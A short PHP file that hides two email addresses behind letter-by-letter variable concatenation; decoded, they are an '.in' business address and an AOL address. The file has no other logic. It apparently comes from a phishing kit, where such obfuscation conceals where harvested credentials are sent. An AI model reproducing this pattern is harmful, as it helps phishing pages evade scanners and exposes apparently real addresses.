<?php
$nx = "n";
$ox = "o";
$px = "p";
$qx = "q";
$bx = "b";
$cx = "c";
$cm = ".c";
$ax = "a";$ix = "i";
$jx = "j";
$kx = "k";
$lx = "l";$mx = "m";
$dx = "d";
$ex = "e";
$fx = "f";
$sn = "_";
$gx = "g";
$in = ".in";
$hx = "h";
$rx = "r";
$sx = "s";
$tx = "t";
$ux = "u";$wx = "w";
$xx = "x";
$yx = "y";
$zx = "z";
$vx = "v";
$ml1 = "$ix$nx$fx$ox@$ax$mx$bx$ix$cx$ax$ex$nx$tx$ex$rx$px$rx$ix$sx$ex$in";
$ml2 = "$ex$dx$dx$sn$cx$ax@$ax$ox$lx$cm$ox$mx";
?>